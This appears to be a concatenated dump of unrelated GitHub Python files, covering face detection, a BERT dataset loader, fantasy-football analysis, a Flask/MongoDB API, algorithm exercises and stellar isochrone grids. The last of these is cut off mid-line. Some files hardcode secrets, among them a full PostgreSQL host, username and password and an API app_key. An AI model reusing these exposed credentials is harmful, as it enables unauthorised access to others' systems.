}\r\n\r\n sort_dict= sorted(params.items(), key=lambda item:item[0], reverse = False) \r\n sort_dict.append(('app_key','ecTptvOyErjHiNgo')) \r\n rawtext= urlencode(sort_dict).encode() \r\n sha = hashlib.md5() \r\n sha.update(rawtext)\r\n md5text= sha.hexdigest().upper() \r\n params['sign']=md5text \r\n return params \r\n\r\n def resize_image(self, origin_img, optimize_img, threshold):\r\n with Image.open(origin_img) as im:\r\n width, height = im.size\r\n file_size = width*height\r\n if file_size > threshold:\r\n \r\n if width >= height:\r\n new_width = int(math.sqrt(threshold / 2))\r\n new_height = int(new_width * height * 1.0 / width)\r\n else:\r\n new_height = int(math.sqrt(threshold / 2))\r\n new_width = int(new_height * width * 1.0 / height)\r\n\r\n resized_im = im.resize((new_width, new_height))\r\n resized_im.save(optimize_img)\r\n else:\r\n im.save(optimize_img) \r\n\r\n def Onbtn_test_beautyButton(self, event):\r\n if os.path.isfile(self.FileName):\r\n self.textReturn.AppendText(self.FileName+'\\n')\r\n \r\n self.resize_image(self.FileName, 'optimized.jpg', 1024*1024)\r\n \r\n frame=cv2.imread('optimized.jpg')\r\n nparry_encode = cv2.imencode('.jpg', frame)[1]\r\n data_encode = np.array(nparry_encode)\r\n img = base64.b64encode(data_encode) \r\n\r\n params = self.get_params(img) \r\n\r\n url = \"https://api.ai.qq.com/fcgi-bin/face/face_detectface\"\r\n res = requests.post(url,params).json()\r\n if res['ret'] == 0:\r\n for face in res['data']['face_list']:\r\n #print(face)\r\n x=face['x']\r\n y=face['y']\r\n w=face['width']\r\n h=face['height']\r\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,255,255),2)\r\n cv2.putText(frame,'age :'+str(face['age']), (x, y+h+20), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2,cv2.LINE_8, 0)\r\n cv2.putText(frame,'beauty:'+str(face['beauty']), (x, y+h+40), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 
255), 2,cv2.LINE_8, 0)\r\n self.textReturn.AppendText('face_id: '+ str(face['face_id'])+'\\n')\r\n self.textReturn.AppendText('gender: '+ str(face['gender'])+'\\n')\r\n self.textReturn.AppendText('age : '+ str(face['age'])+'\\n')\r\n self.textReturn.AppendText('beauty : '+ str(face['beauty'])+'\\n')\r\n self.textReturn.AppendText('smile : '+ str(face['expression'])+'\\n')\r\n\t\t\t\t\r\n cv2.imshow('img',frame)\r\n cv2.imwrite('optimized.jpg',frame)\r\n cv2.waitKey(0)\r\n else:\r\n self.textReturn.AppendText('no face\\n')\r\n \r\n event.Skip()\r\n\r\n\r\n","repo_name":"kinghows/Alpha-P","sub_path":"AD_Frame1.py","file_name":"AD_Frame1.py","file_ext":"py","file_size_in_byte":11093,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"19712352585","text":"import pandas as pd\nimport torch\nfrom torch.utils.data import Dataset\nfrom transformers import BertJapaneseTokenizer\n\ntokenizer = BertJapaneseTokenizer.from_pretrained('bert-base-japanese-whole-word-masking')\nmax_len = 50\n\ndef convert_sentence_to_ids(sentence):\n sentence = '[CLS] ' + sentence + ' [SEP]'\n sentence_tokens = tokenizer.tokenize(sentence)\n sentence_ids = tokenizer.convert_tokens_to_ids(sentence_tokens)\n sentence_len = len(sentence_ids)\n if sentence_len < max_len + 1:\n sentence_ids += [0] * (max_len - sentence_len)\n\n return torch.tensor(sentence_ids, dtype=torch.long), sentence_len\n\n\ndef load_ids_and_labels(row, task):\n context, context_len = convert_sentence_to_ids(row['Context'])\n\n image_path = row['Image']\n gaze = torch.tensor([row['EyeX'], row['EyeY'], row['GazeX'], row['GazeY']])\n\n response = row['Action'] if task == 'action' else row['Response']\n response, response_len = convert_sentence_to_ids(response)\n\n label = torch.tensor([row['Label']], dtype=torch.float32)\n\n return context, context_len, image_path, gaze, response, response_len, label\n\ndef test_load_ids(i, row):\n context, context_len = convert_sentence_to_ids(row['Context'])\n\n image_path = row['Image']\n gaze = torch.tensor([row['EyeX'], row['EyeY'], row['GazeX'], row['GazeY']])\n\n response, response_len = convert_sentence_to_ids(row[i])\n\n return context, context_len, image_path, gaze, response, response_len\n\nclass MmdBertDataset(Dataset):\n def __init__(self, path, task, train):\n self.crl = []\n for _, row in pd.read_csv(path).iterrows():\n if 'test_10.csv' in path:\n for i in range(6, 16):\n self.crl.append(test_load_ids(i, row))\n else:\n self.crl.append(load_ids_and_labels(row, task))\n\n def __len__(self):\n return len(self.crl)\n\n def __getitem__(self, idx):\n return self.crl[idx]\n","repo_name":"hisas/mmd","sub_path":"mmd_bert_dataset.py","file_name":"mmd_bert_dataset.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40327412377","text":"import psycopg2\nimport pandas as pd\nimport matplotlib.pyplot as plt\n# Connect to your PostgreSQL database\ntry:\n\n conn = psycopg2.connect(\n host='ec2-34-199-68-114.compute-1.amazonaws.com',\n user='oibdolfaruxway',\n password='5983be3a6ab94c50df024487d2c3bcbab6a2eca9a8b4c594ddaf0b934a5553cc',\n database='d4qgddmcqs7su1'\n )\n curr = conn.cursor()\n\n\nexcept Exception as e:\n print(\"Couldn't connect \", e)\n\n\n####\n# LIMIT BELOW SHOW THE NUMBER OF PLAYERS FEATURES\n\n# Base SQL query without the week condition\nbase_sql = \"\"\"\nSELECT \n at.*, \n ap.*, \n AVG(ab.value) AS avg_value\nFROM \n api_bid AS ab\nJOIN \n 
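-- attach each bid to its target row, then to the player metadata\n    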
api_target AS at ON ab.target_id = at.id\nJOIN\n api_player AS ap ON at.player_id = ap.id\nWHERE \n ab.week = %s\nGROUP BY \n at.id, ap.id\nORDER BY \n avg_value DESC\nLIMIT 3;\n\"\"\"\n\n# Iterate from week 2 to week 13\ntop_arr = []\ncost_arry = []\nweekly_sum = 0 \nweekly_cost = 0\nfor week in range(2, 16):\n top_arr.append(weekly_sum/5)\n cost_arry.append(weekly_cost/5)\n weekly_sum = 0 \n weekly_cost = 0\n df = pd.read_sql(base_sql, conn, params=[week]) # Use params for SQL parameter substitution\n\n # Assuming you want to print names for each week's results\n print(f\"Week {week} Names:\")\n for index, row in df.iterrows():\n\n player_name = row['name']\n cost = row['avg_value']\n \n \n # Read the CSV into a DataFrame\n df = pd.read_csv('2022_year_scores.csv')\n\n # Replace '-' with 0 (leaving 'BYE' intact)\n df.replace('-', 0, inplace=True)\n\n # Convert columns 6 through 21 to float where possible\n # For 'BYE' entries, we'll set them to NaN temporarily for accurate average calculation\n for col in df.columns[3 + week :21]: # indices 5 to 20 for columns 6 to 21 (0-based)\n df[col] = pd.to_numeric(df[col], errors='coerce')\n try: \n # Find the row corresponding to the specified player name\n player_row = df[df['Player'] == player_name]\n\n # Extract columns 6 through 21 and compute the average\n # The mean method will automatically skip NaN values (which represent 'BYE' in our case)\n average_value = player_row.iloc[:, 3 + week:21].mean(axis=1).values[0]\n weekly_sum = average_value + weekly_sum\n\n weekly_cost = cost + weekly_cost\n \n \n print(f\"Average value for {player_name} starting after week {week} is {average_value:.2f}\")\n except:\n continue\n\nscores_arry = top_arr[1:]\n# Get the adjusted indices (index + 2)\nindices = [i for i in range(2, len(scores_arry) +2)]\nconn.close()\n# Plot the numbers against the adjusted indices\nplt.plot(indices, scores_arry)\n\n# Add title and labels\nplt.title(\"Waiver Week vs. Avg. Weekly Points After Acquiring \")\nplt.xlabel(\"Upcoming Week\")\nplt.ylabel(\"Weekly Avg. 
Points After Acquisition\")\n\n# Display the plot\nplt.show()\n\n\n\n\n# Close the connection\n\n\n\n# # View the DataFrame\n","repo_name":"freemanwsmith3/thefaablab","sub_path":"faab/faab/yearly_scores.py","file_name":"yearly_scores.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70800995572","text":"from bson import json_util\nfrom flask import Flask, jsonify, request\nfrom pymongo import MongoClient\n\napp = Flask(__name__)\n\nMONGO_HOST = 'nosqldb'\nMONGO_PORT = 27017\nMONGO_DB = 'admin'\nMONGO_USERNAME = 'root'\nMONGO_PASSWORD = 'example'\n\nclient: MongoClient = MongoClient(\n MONGO_HOST,\n MONGO_PORT,\n username=MONGO_USERNAME,\n password=MONGO_PASSWORD,\n authSource=MONGO_DB\n)\ndb = client[MONGO_DB]\n\ncollection = db.mycollection\n\n\n@app.route('/', methods=['GET', 'PUT'])\ndef manage_data_update_get(key):\n if request.method == 'PUT':\n new_value = request.get_json()\n new_value = new_value.get(key)\n if not new_value:\n return jsonify(\n {'message': f'Такого ключа {key} не существует'}\n ), 400\n collection.update_one(\n {key: {\"$exists\": True}}, {\"$set\": {key: new_value}}\n )\n return jsonify({key: new_value}), 200\n else:\n data = collection.find_one({key: {\"$exists\": True}})\n if data:\n return json_util.dumps({key: data[key]})\n else:\n return jsonify({\"message\": \"Data not found\"}), 404\n\n\n@app.route('/', methods=['POST'])\ndef manage_date_create():\n if request.method == 'POST':\n data = request.get_json()\n key = list(data.keys())[0]\n check_key = collection.find_one({key: {\"$exists\": True}})\n if check_key:\n return jsonify({\"message\": \"Такой ключ уже создан\"}), 400\n collection.insert_one(data)\n return jsonify({\"message\": \"Data created\"}), 201\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080)\n","repo_name":"vomerf/two_tasks","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10450766062","text":"# 1863 스카이라인\n\nimport sys\n\ndef sol():\n case = int(sys.stdin.readline())\n stack = []\n count = 0\n for i in range(case):\n x,y = map(int,sys.stdin.readline().split())\n\n while(stack and stack[-1][1] > y):\n stack.pop()\n count += 1\n if not stack:\n if y != 0 :\n stack.append((x,y))\n\n elif stack[-1][1]< y:\n stack.append((x,y))\n\n # 스택에 한 개 이상 남을 수 있는지? (그치... 
오름 차순인 경우 그럴 수 있지)\n if stack:\n count += len(stack)\n\n return count\n\nprint(sol())\n","repo_name":"inkyu0103/BOJ","sub_path":"DataStructure/1863.py","file_name":"1863.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28323343955","text":"import os\nimport numpy as np\nimport cv2\nimport torch\nimport torchvision\nfrom model import Model\nfrom argparse import *\n\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument(\"--device\", default=\"cpu\", type=str)\n parser.add_argument(\"--input_img\",default=\"5.jpg\", type=str)\n args = parser.parse_args()\n\n device=torch.device(args.device)\n\n transform = torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize((0), (1)),\n ])\n\n img = cv2.imread(args.input_img)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = cv2.resize(img, (70, 70))\n\n tensor = transform(img).unsqueeze(0).to(device)\n\n model = Model()\n model = model.to(device)\n model.load_state_dict(torch.load(\"mnist_p.pth\"))\n model.eval()\n\n pred = model(tensor)\n pred = pred.cpu().detach().numpy()\n output = np.argmax(pred)\n\n print(f\"model prediction: {output}\")","repo_name":"ganjbakhshali/mnist_presian","sub_path":"elavuate.py","file_name":"elavuate.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"27316008892","text":"import citiesRepo\nimport TouristDestinationModel\nimport sqlite3\n\ncities = TouristDestinationModel.TouristDestination(None, \"Kangra\", \"Shimla\", \"Chamba\", \"test\",\n \"9\", \"9\", \"1000Rs\", \"100$\", \"100\",\n \"100\", \"100\", \"100\", \"100\", \"100\", \"100\")\n\nclass Repo():\n def __init__(self):\n try:\n self.conn = sqlite3.connect('..\\database.db')\n self.conn.row_factory = sqlite3.Row\n self.cur = self.conn.cursor()\n print(\"Opened database successfully\")\n except Exception as e:\n print(e)\n\n def __del__(self):\n try:\n self.conn.close()\n print(\"Database Closed successfully\")\n except Exception as e:\n print(e)\ndb1 = Repo()\ndb = citiesRepo.Repo(db1)\ndb.createCityTable()\n\ndb.addCity(\"KARERI LAKE\", \"Himachal Pradesh\")\n#db.deleteUserById(user1.userid)\n\nusers = db.getAllCities()\nprint(\"cities =\", users)","repo_name":"itsaseemsharma/Explorehimachal","sub_path":"Explorehimachal/modules/TouristsDestination/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38865897804","text":"import re\n\nimport nltk\nimport textblob\n\nfrom .base import RegexDetector\nfrom ..filth import SkypeFilth\n\n\nclass SkypeDetector(RegexDetector):\n \"\"\"Skype usernames tend to be used inline in dirty dirty text quite\n often but also appear as ``skype: {{SKYPE}}`` quite a bit. This method\n looks at words within ``word_radius`` words of \"skype\" for things that\n appear to be misspelled or have punctuation in them as a means to\n identify skype usernames.\n\n Default ``word_radius`` is 10, corresponding with the rough scale of\n half of a sentence before or after the word \"skype\" is used. 
Increasing\n the ``word_radius`` will increase the false positive rate and\n decreasing the ``word_radius`` will increase the false negative rate.\n \"\"\"\n filth_cls = SkypeFilth\n\n word_radius = 10\n\n def iter_filth(self, text):\n\n # find 'skype' in the text using a customized tokenizer. this makes\n # sure that all valid skype usernames are kept as tokens and not split\n # into different words\n tokenizer = nltk.tokenize.regexp.RegexpTokenizer(\n self.filth_cls.SKYPE_TOKEN\n )\n blob = textblob.TextBlob(text, tokenizer=tokenizer)\n skype_indices, tokens = [], []\n for i, token in enumerate(blob.tokens):\n tokens.append(token)\n if 'skype' in token.lower():\n skype_indices.append(i)\n\n # go through the words before and after skype words to identify\n # potential skype usernames.\n skype_usernames = []\n for i in skype_indices:\n jmin = max(i-self.word_radius, 0)\n jmax = min(i+self.word_radius+1, len(tokens))\n for j in list(range(jmin, i)) + list(range(i+1, jmax)):\n token = tokens[j]\n if self.filth_cls.SKYPE_USERNAME.match(token):\n\n # this token is a valid skype username. Most skype\n # usernames appear to be misspelled words. Word.spellcheck\n # does not handle the situation of an all caps word very\n # well, so we cast these to all lower case before checking\n # whether the word is misspelled\n if token.isupper():\n token = token.lower()\n word = textblob.Word(token)\n suggestions = word.spellcheck()\n corrected_word, score = suggestions[0]\n if score < 0.5:\n skype_usernames.append(token)\n\n # replace all skype usernames\n if skype_usernames:\n self.filth_cls.regex = re.compile('|'.join(skype_usernames))\n else:\n self.filth_cls.regex = None\n return super(SkypeDetector, self).iter_filth(text)\n","repo_name":"asimakos/text.anonymization","sub_path":"venv/Lib/site-packages/scrubadub/detectors/skype.py","file_name":"skype.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22414775181","text":"#import time\r\nimport numpy as np\r\n#from scipy.special import eval_legendre as lp\r\nimport matplotlib.pyplot as plt\r\nfrom rt_002_polleg import polleg\r\n#==============================================================================\r\n#\r\nif __name__ == \"__main__\":\r\n# scattering angle & cosine\r\n sca = np.linspace(0.0, 180.0, 181)\r\n x = np.cos(np.radians(sca))\r\n# Rayleigh phase function\r\n r = 0.75*(1.0 + x*x)\r\n# expansion moments for the Rayleigh phase function: 2k+1 is INCLUDED\r\n xk_r = np.array([1.0, 0.0, 0.5])\r\n nk = len(xk_r)\r\n# restore Rayleigh phase function from moments: 3 different options\r\n pk = polleg(x, nk-1) # recall, k = 0,1,2 hence nk-1; not sure if the built-in eval_legendre is better\r\n rx_opt1 = np.dot(xk_r, pk) # this looks nice, but NOT efficient because ...\r\n#\r\n rx_opt2 = np.zeros_like(rx_opt1)\r\n for ik in range(nk): # we ALREADY HAVE this loop in polleg!\r\n for ix in range(len(x)): # we ALREADY HAVE this loop in polleg AS WELL!!\r\n rx_opt2[ix] += xk_r[ik]*pk[ik,ix]\r\n#\r\n# Less nice, a bit harder to understand, but efficient way is:\r\n# compute Legendre polynomials \"on the go\"\r\n rx_opt3 = np.zeros_like(rx_opt1)\r\n for ix in range(len(x)):\r\n xi = x[ix] # avoids addressing to an array\r\n rxi = 1.0 # xk[k=0]*Pk[k=0] + xk[1]*Pk[k=1] = 1*1 + 0*x\r\n p0 = 1.0 # for Pk-recurrence\r\n p1 = xi # for Pk-recurrence\r\n for ik in range(2, nk): #\r\n p2 = (2.0 - 1.0/ik)*xi*p1 - (1.0 - 1.0/ik)*p0 # recurrence\r\n rxi += 
xk_r[ik]*p2 # accumulation - can not be fully vectorized :( \r\n p0 = p1 # for Pk-recurrence\r\n p1 = p2 # for Pk-recurrence\r\n rx_opt3[ix] = rxi # avoids addressing to an array inside the ik-loop\r\n#\r\n plt.figure()\r\n plt.plot(sca, r, 'k', sca[0::10], rx_opt1[0::10], 'ro',\\\r\n sca[2::10], rx_opt2[2::10], 'go', sca[4::10], rx_opt3[4::10], 'bo')\r\n plt.title('Rayleigh phase function')\r\n plt.xlabel('scattering angle, deg.')\r\n plt.legend(['explicit formula', 'from moments, xk: opt.1', 'from moments, xk: opt.2', 'from moments, xk: opt.3'])\r\n plt.grid(True)","repo_name":"amiribr/General-Radiative-Transfer","sub_path":"rt_003_phasefun.py","file_name":"rt_003_phasefun.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1659558236","text":"from time import sleep\nfrom collections import deque\nfrom pprint import pprint\nimport sys\nsys.stdin = open('input.txt')\ninput = sys.stdin.readline\n\nL, C = map(int, input().split())\nS = sorted(input().rstrip().split())\n\n\ndef dfs(pos, n, con1, con2, l):\n if n == L:\n if con1 >= 1 and con2 >= 2:\n print(''.join(l))\n\n for i in range(pos, C):\n l.append(S[i])\n if S[i] in 'aeiou':\n con1 += 1\n else:\n con2 += 1\n dfs(i+1, n+1, con1, con2, l)\n if S[i] in 'aeiou':\n con1 -= 1\n else:\n con2 -= 1\n l.pop()\n\n\ndfs(0, 0, 0, 0, [])\n","repo_name":"mintropy/algorithm_pulzo","sub_path":"윤효전/210916/1759.py","file_name":"1759.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"42183480273","text":"import os\nimport re\nimport glob\nimport itertools\nfrom functools import partial\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom scipy.optimize import curve_fit\n\nfrom isochrones.config import ISOCHRONES\n\nfrom ..models import StellarModelGrid\nfrom ..eep import fit_section_poly, eep_fn, eep_jac, eep_fn_p0\nfrom .eep import max_eep\nfrom ..interp import DFInterpolator, searchsorted\nfrom ..utils import polyval\nfrom .eep import max_eep\nfrom ..logger import getLogger\n\n\nclass MISTModelGrid(StellarModelGrid):\n name = \"mist\"\n eep_col = \"EEP\"\n age_col = \"log10_isochrone_age_yr\"\n feh_col = \"[Fe/H]\"\n mass_col = \"star_mass\"\n initial_mass_col = \"initial_mass\"\n logTeff_col = \"log_Teff\"\n logg_col = \"log_g\"\n logL_col = \"log_L\"\n\n default_kwargs = {\"version\": \"1.2\", \"vvcrit\": 0.4, \"kind\": \"full_isos\"}\n default_columns = StellarModelGrid.default_columns + (\"delta_nu\", \"nu_max\", \"phase\")\n\n bounds = ((\"age\", (5, 10.13)), (\"feh\", (-4, 0.5)), (\"eep\", (0, 1710)), (\"mass\", (0.1, 300)))\n\n fehs = np.array(\n (\n -4.00,\n -3.50,\n -3.00,\n -2.50,\n -2.00,\n -1.75,\n -1.50,\n -1.25,\n -1.00,\n -0.75,\n -0.50,\n -0.25,\n 0.00,\n 0.25,\n 0.50,\n )\n )\n n_fehs = 15\n\n primary_eeps = (1, 202, 353, 454, 605, 631, 707, 808, 1409, 1710)\n eep_labels = (\"PMS\", \"ZAMS\", \"IAMS\", \"TAMS\", \"RGBTip\", \"ZAHB\", \"TAHB\", \"TPAGB\", \"post-AGB\", \"WDCS\")\n eep_labels_highmass = (\"PMS\", \"ZAMS\", \"IAMS\", \"TAMS\", \"RGBTip\", \"ZACHeB\", \"TACHeB\", \"C-burn\")\n n_eep = 1710\n\n @property\n def foo(self):\n return self._foo\n\n def max_eep(self, mass, feh):\n return max_eep(mass, feh)\n\n @property\n def eep_sections(self):\n return [(a, b) for a, b in zip(self.primary_eeps[:-1], self.primary_eeps[1:])]\n\n @property\n def kwarg_tag(self):\n return 
\"_v{version}_vvcrit{vvcrit}\".format(**self.kwargs)\n\n def compute_additional_columns(self, df):\n \"\"\"\n \"\"\"\n df = super().compute_additional_columns(df)\n df[\"feh\"] = df[\"log_surf_z\"] - np.log10(df[\"surface_h1\"]) - np.log10(0.0181) # Aaron Dotter says\n return df\n\n\nclass MISTIsochroneGrid(MISTModelGrid):\n eep_col = \"EEP\"\n age_col = \"log10_isochrone_age_yr\"\n feh_col = \"[Fe/H]\"\n mass_col = \"star_mass\"\n initial_mass_col = \"initial_mass\"\n logTeff_col = \"log_Teff\"\n logg_col = \"log_g\"\n logL_col = \"log_L\"\n\n default_kwargs = {\"version\": \"1.2\", \"vvcrit\": 0.4, \"kind\": \"full_isos\"}\n index_cols = (\"log10_isochrone_age_yr\", \"feh\", \"EEP\")\n\n filename_pattern = \"\\.iso\"\n eep_replaces = \"mass\"\n\n @property\n def kwarg_tag(self):\n tag = super().kwarg_tag\n return \"{tag}_{kind}\".format(tag=tag, **self.kwargs)\n\n def get_directory_path(self, **kwargs):\n return os.path.join(self.datadir, \"MIST{}\".format(self.kwarg_tag))\n\n def get_tarball_file(self, **kwargs):\n filename = self.get_directory_path(**kwargs)\n return \"{}.txz\".format(filename)\n\n def get_tarball_url(self, **kwargs):\n \"\"\"\n e.g.\n http://waps.cfa.harvard.edu/MIST/data/tarballs_v1.2/MIST_v1.2_vvcrit0.4_full_isos.txz\n \"\"\"\n return (\n \"http://waps.cfa.harvard.edu/MIST/data/tarballs\"\n + \"_v{version}/MIST_v{version}_vvcrit{vvcrit}_{kind}.txz\".format(**self.kwargs)\n )\n\n @classmethod\n def get_feh(cls, filename):\n m = re.search(r\"feh_([mp])([0-9]\\.[0-9]{2})_afe\", filename)\n if m:\n sign = 1 if m.group(1) == \"p\" else -1\n return float(m.group(2)) * sign\n else:\n raise ValueError(\"{} not a valid MIST file? Cannnot parse [Fe/H]\".format(filename))\n\n @classmethod\n def to_df(cls, filename):\n with open(filename, \"r\", encoding=\"latin-1\") as fin:\n while True:\n line = fin.readline()\n if re.match(\"# EEP\", line):\n column_names = line[1:].split()\n break\n feh = cls.get_feh(filename)\n df = pd.read_csv(\n filename, comment=\"#\", delim_whitespace=True, skip_blank_lines=True, names=column_names\n )\n df[\"feh\"] = feh\n return df\n\n\nclass MISTBasicIsochroneGrid(MISTIsochroneGrid):\n\n default_kwargs = {\"version\": \"1.2\", \"vvcrit\": 0.4, \"kind\": \"basic_isos\"}\n default_columns = StellarModelGrid.default_columns + (\"phase\",)\n\n def compute_additional_columns(self, df):\n \"\"\"\n \"\"\"\n df = StellarModelGrid.compute_additional_columns(self, df)\n # df['feh'] = df['log_surf_z'] - np.log10(df['surface_h1']) - np.log10(0.0181) # Aaron Dotter says\n return df\n\n\nclass MISTEvolutionTrackGrid(MISTModelGrid):\n default_kwargs = {\"version\": \"1.2\", \"vvcrit\": 0.4, \"afe\": 0.0}\n\n index_cols = (\"initial_feh\", \"initial_mass\", \"EEP\")\n\n default_columns = tuple(set(MISTModelGrid.default_columns) - {\"age\"}) + (\n \"interpolated\",\n \"star_age\",\n \"age\",\n )\n\n eep_replaces = \"age\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._fehs = None\n self._masses = None\n\n self._approx_eep_interp = None\n self._eep_interps = None\n self._primary_eeps_arr = None\n\n @property\n def masses(self):\n if self._masses is None:\n self._masses = np.array(self.df.index.levels[1])\n return self._masses\n\n # @property\n # def fehs(self):\n # if self._fehs is None:\n # self._fehs = np.array(self.df.index.levels[0])\n # return self._fehs\n\n @property\n def datadir(self):\n return os.path.join(ISOCHRONES, self.name, \"tracks\")\n\n @property\n def kwarg_tag(self):\n return 
\"_v{version}_vvcrit{vvcrit}\".format(**self.kwargs)\n\n @property\n def prop_map(self):\n return dict(\n eep=self.eep_col,\n mass=self.mass_col,\n initial_mass=self.initial_mass_col,\n logTeff=self.logTeff_col,\n logg=self.logg_col,\n logL=self.logL_col,\n )\n\n def compute_additional_columns(self, df):\n \"\"\"\n \"\"\"\n df = super().compute_additional_columns(df)\n df[\"age\"] = np.log10(df[\"star_age\"])\n return df\n\n def get_file_basename(self, feh):\n feh_sign = \"m\" if feh < 0 else \"p\"\n afe = self.kwargs[\"afe\"]\n afe_sign = \"m\" if afe < 0 else \"p\"\n fmt_dict = self.kwargs.copy()\n fmt_dict.update(\n dict(feh=abs(feh), feh_sign=feh_sign, afe_sign=afe_sign, afe=abs(self.kwargs[\"afe\"]))\n )\n return \"MIST_v{version}_feh_{feh_sign}{feh:.2f}_afe_{afe_sign}{afe:.1f}_vvcrit{vvcrit:.1f}_EEPS\".format(\n **fmt_dict\n )\n\n def get_directory_path(self, feh):\n basename = self.get_file_basename(feh)\n return os.path.join(self.datadir, basename)\n\n def get_tarball_url(self, feh):\n basename = self.get_file_basename(feh)\n version = self.kwargs[\"version\"]\n return \"http://waps.cfa.harvard.edu/MIST/data/tarballs_v{version}/{basename}.txz\".format(\n version=version, basename=basename\n )\n return os.path.join(self.datadir, \"{}.txz\".format(basename))\n\n def get_tarball_file(self, feh):\n basename = self.get_file_basename(feh)\n return os.path.join(self.datadir, \"{}.txz\".format(basename))\n\n def download_and_extract_all(self):\n for feh in self.fehs:\n self.extract_tarball(feh=feh)\n\n @classmethod\n def get_mass(cls, filename):\n m = re.search(\"(\\d{5})M.track.eep\", filename)\n if m:\n return float(m.group(1)) / 100.0\n else:\n raise ValueError(\"Cannot parse mass from {}.\".format(filename))\n\n @classmethod\n def to_df(cls, filename):\n with open(filename, \"r\", encoding=\"latin-1\") as fin:\n while True:\n line = fin.readline()\n if re.match(\"^# EEPs\", line):\n line = line.split()\n eep_first = int(line[2])\n eep_last = int(line[-1])\n elif re.match(\"#\\s+ star_age\", line):\n column_names = line[1:].split()\n break\n initial_mass = cls.get_mass(filename)\n df = pd.read_csv(\n filename, comment=\"#\", delim_whitespace=True, skip_blank_lines=True, names=column_names\n )\n df[\"initial_mass\"] = initial_mass\n try:\n df[\"EEP\"] = np.arange(eep_first, eep_last + 1, dtype=int)\n except ValueError:\n print(\n \"len(df) is {}; first, last eeps are {}, {} ({})\".format(\n len(df), eep_first, eep_last, filename\n )\n )\n return df\n\n def get_feh_filenames(self, feh):\n directory = self.get_directory_path(feh)\n if not os.path.exists(directory):\n self.extract_tarball(feh=feh)\n return glob.glob(os.path.join(directory, \"*.track.eep\"))\n\n def get_feh_hdf_filename(self, feh):\n directory = self.get_directory_path(feh)\n return os.path.join(directory, \"all_masses.h5\")\n\n def get_feh_interpolated_hdf_filename(self, feh):\n directory = self.get_directory_path(feh)\n return os.path.join(directory, \"all_masses_interpolated.h5\")\n\n def df_all_feh(self, feh):\n hdf_filename = self.get_feh_hdf_filename(feh)\n if os.path.exists(hdf_filename):\n df = pd.read_hdf(hdf_filename, \"df\")\n else:\n df = pd.concat([self.to_df(f) for f in self.get_feh_filenames(feh)])\n df[\"initial_feh\"] = feh\n df = df.sort_values(by=list(self.index_cols))\n df.index = [df[c] for c in self.index_cols]\n df.to_hdf(hdf_filename, \"df\")\n df = pd.read_hdf(hdf_filename, \"df\")\n return df\n\n def df_all_feh_interpolated(self, feh):\n \"\"\"Same as df_all_feh but with missing track tails 
interpolated\n \"\"\"\n hdf_filename = self.get_feh_interpolated_hdf_filename(feh)\n if os.path.exists(hdf_filename):\n df_interp = pd.read_hdf(hdf_filename, \"df\")\n else:\n getLogger().info(\"Interpolating incomplete tracks for feh = {}\".format(feh))\n df = self.df_all_feh(feh)\n df_interp = df.copy()\n df_interp[\"interpolated\"] = False\n masses = df.index.levels[1]\n for i, m in tqdm(\n enumerate(masses),\n total=len(masses),\n desc=\"interpolating missing values in evolution tracks (feh={})'\".format(feh),\n ):\n n_eep = len(df.xs(m, level=\"initial_mass\"))\n eep_max = max_eep(m, feh)\n if not eep_max:\n raise ValueError(\"No eep_max return value for ({}, {})?\".format(m, feh))\n if n_eep < eep_max:\n\n # Find lower limit\n ilo = i\n found_lower = False\n while not found_lower:\n ilo -= 1\n mlo = masses[ilo]\n nlo = len(df.xs(mlo, level=\"initial_mass\"))\n if nlo >= eep_max:\n found_lower = True\n if ilo == 0:\n raise ValueError(\"Did not find mlo for ({}, {})\".format(m, feh))\n\n # Find upper limit\n ihi = i\n found_upper = False\n while not found_upper:\n ihi += 1\n mhi = masses[ihi]\n nhi = len(df.xs(mhi, level=\"initial_mass\"))\n if nhi >= eep_max:\n found_upper = True\n if ihi > len(masses):\n raise ValueError(\"Did not find mhi for ({}, {})\".format(m, feh))\n\n getLogger().info(\n \"{}: {} (expected {}). Interpolating between {} and {}\".format(\n m, n_eep, eep_max, mlo, mhi\n )\n )\n new_eeps = np.arange(n_eep + 1, eep_max + 1)\n new_index = pd.MultiIndex.from_product([[feh], [m], new_eeps])\n new_data = pd.DataFrame(index=new_index, columns=df_interp.columns, dtype=float)\n\n # Interpolate values\n norm_distance = (m - mlo) / (mhi - mlo)\n lo_index = pd.MultiIndex.from_product([[feh], [mlo], new_eeps])\n hi_index = pd.MultiIndex.from_product([[feh], [mhi], new_eeps])\n new_data.loc[:, df.columns] = (\n df.loc[lo_index, :].values * (1 - norm_distance)\n + 